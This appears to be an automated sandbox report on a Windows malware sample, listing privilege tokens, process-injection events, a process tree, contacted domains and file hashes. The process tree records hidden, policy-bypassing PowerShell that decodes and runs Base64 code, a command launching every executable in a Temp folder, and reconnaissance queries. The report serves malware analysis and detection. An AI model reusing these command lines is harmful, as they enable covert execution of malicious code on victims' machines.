Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3060 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3060 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3060 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1676 wrote to memory of 876 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 876 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 876 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 876 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe

"C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe"

C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('powErSHeLL -nopRo -ExecUTIoNpO BYpaSS -w HId -ec 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')); Invoke-Expression $script}"

C:\Windows\SysWOW64\cmd.exe

cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/337944881edc1d04f3adae65201e2427/" && (for %F in (*.exe) do start "" "%F")"

C:\Users\Admin\AppData\Local\Temp\337944881edc1d04f3adae65201e2427\vlc.exe

"vlc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\85f33d6a260e76acb14f8d50b3a6138d.pdf

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\85f33d6a260e76acb14f8d50b3a6138d.pdf"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec 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

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 45.61.158.86:80 45.61.158.86 tcp
US 8.8.8.8:53 availabkelk.store udp
US 8.8.8.8:53 questionsmw.store udp
US 8.8.8.8:53 soldiefieop.site udp
US 8.8.8.8:53 abnomalrkmu.site udp
US 8.8.8.8:53 chorusarorp.site udp
US 8.8.8.8:53 treatynreit.site udp
US 8.8.8.8:53 snarlypagowo.site udp
US 8.8.8.8:53 mysterisop.site udp
US 8.8.8.8:53 absorptioniw.site udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp

Files

\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

MD5 5ecd826babbebdd959456c471dec6465
SHA1 f94a596b742c0653ff7201469f133108f17b46e9
SHA256 b2be43c010bc0d268a42a11296829e088d7eef81cc39bfcdc0b9f0e9a65717ea
SHA512 30563a15786f245e4a7ff1b8996f302dbf4b1d4950098d6899815b5065d3058b290a81b6564c19c85cfcd425c08c9f6bac5bc31ba95773978f9a9c5cde123d38

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe

MD5 48c96771106dbdd5d42bba3772e4b414
SHA1 e84749b99eb491e40a62ed2e92e4d7a790d09273
SHA256 a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22
SHA512 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\java.dll

MD5 73bd0b62b158c5a8d0ce92064600620d
SHA1 63c74250c17f75fe6356b649c484ad5936c3e871
SHA256 e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30
SHA512 eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f

memory/2200-229-0x0000000000400000-0x000000000042F000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr100.dll

MD5 bf38660a9125935658cfa3e53fdc7d65
SHA1 0b51fb415ec89848f339f8989d323bea722bfd70
SHA256 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
SHA512 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\i386\jvm.cfg

MD5 9fd47c1a487b79a12e90e7506469477b
SHA1 7814df0ff2ea1827c75dcd73844ca7f025998cc6
SHA256 a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e
SHA512 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\client\jvm.dll

MD5 39c302fe0781e5af6d007e55f509606a
SHA1 23690a52e8c6578de6a7980bb78aae69d0f31780
SHA256 b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc
SHA512 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\verify.dll

MD5 de2167a880207bbf7464bcd1f8bc8657
SHA1 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7
SHA256 fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3
SHA512 bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\meta-index

MD5 91aa6ea7320140f30379f758d626e59d
SHA1 3be2febe28723b1033ccdaa110eaf59bbd6d1f96
SHA256 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4
SHA512 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\zip.dll

MD5 cb99b83bbc19cd0e1c2ec6031d0a80bc
SHA1 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd
SHA256 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec
SHA512 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba

memory/1676-249-0x00000000027F0000-0x0000000002818000-memory.dmp

memory/1676-253-0x0000000002838000-0x0000000002840000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\meta-index

MD5 77abe2551c7a5931b70f78962ac5a3c7
SHA1 a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc
SHA256 c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4
SHA512 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935

memory/1676-257-0x0000000002840000-0x0000000002848000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\asm-all.jar

MD5 f5ad16c7f0338b541978b0430d51dc83
SHA1 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a
SHA256 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d
SHA512 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a

memory/1676-276-0x0000000002828000-0x0000000002830000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-runtime.jar

MD5 d5ef47c915bef65a63d364f5cf7cd467
SHA1 f711f3846e144dddbfb31597c0c165ba8adf8d6b
SHA256 9c287472408857301594f8f7bda108457f6fdae6e25c87ec88dbf3012e5a98b6
SHA512 04aeb956bfcd3bd23b540f9ad2d4110bb2ffd25fe899152c4b2e782daa23a676df9507078ecf1bfc409ddfbe2858ab4c4c324f431e45d8234e13905eb192bae8

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-json-ext.jar

MD5 fde38932b12fc063451af6613d4470cc
SHA1 bc08c114681a3afc05fb8c0470776c3eae2eefeb
SHA256 9967ea3c3d1aee8db5a723f714fba38d2fc26d8553435ab0e1d4e123cd211830
SHA512 0f211f81101ced5fff466f2aab0e6c807bb18b23bc4928fe664c60653c99fa81b34edf5835fcc3affb34b0df1fa61c73a621df41355e4d82131f94fcc0b0e839

memory/1676-287-0x0000000002898000-0x00000000028A0000-memory.dmp

memory/1676-294-0x00000000028A8000-0x00000000028B0000-memory.dmp

memory/1676-292-0x00000000028A0000-0x00000000028A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\jfxrt.jar

MD5 042b3675517d6a637b95014523b1fd7d
SHA1 82161caf5f0a4112686e4889a9e207c7ba62a880
SHA256 a570f20f8410f9b1b7e093957bf0ae53cae4731afaea624339aa2a897a635f22
SHA512 7672d0b50a92e854d3bd3724d01084cc10a90678b768e9a627baf761993e56a0c6c62c19155649fe9a8ceeabf845d86cbbb606554872ae789018a8b66e5a2b35

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-gui-ext.jar

MD5 6696368a09c7f8fed4ea92c4e5238cee
SHA1 f89c282e557d1207afd7158b82721c3d425736a7
SHA256 c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4
SHA512 0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-desktop-ext.jar

MD5 b50e2c75f5f0e1094e997de8a2a2d0ca
SHA1 d789eb689c091536ea6a01764bada387841264cb
SHA256 cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23
SHA512 57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-core.jar

MD5 7e5e3d6d352025bd7f093c2d7f9b21ab
SHA1 ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57
SHA256 5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a
SHA512 c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-app-framework.jar

MD5 0c8768cdeb3e894798f80465e0219c05
SHA1 c4da07ac93e4e547748ecc26b633d3db5b81ce47
SHA256 15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669
